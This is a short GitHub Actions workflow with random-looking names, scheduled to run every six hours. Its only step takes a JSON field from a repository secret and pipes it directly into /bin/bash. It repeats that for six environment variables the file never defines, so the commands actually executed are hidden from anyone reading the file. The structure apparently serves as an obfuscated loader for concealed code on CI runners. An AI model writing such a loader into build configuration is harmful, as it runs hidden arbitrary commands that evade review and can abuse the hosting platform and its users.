name: liaifangxin1985
on:
  workflow_dispatch:
  schedule:
    - cron: '20 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: liaifangxin1985
        env:
          elzuf497: ${{ secrets.elzuf497 }}
        run: |
          echo $elzuf497 | jq -r .hsv582 | /bin/bash
          echo $idgn5 | jq -r .dkb65 | /bin/bash
          echo $mejpy7954 | jq -r .y83598 | /bin/bash
          echo $n5021 | jq -r .h6348 | /bin/bash
          echo $voc27 | jq -r .pjehn10 | /bin/bash
          echo $l9821 | jq -r .l28239 | /bin/bash
          echo $wdwo814 | jq -r .qmjo76 | /bin/bash

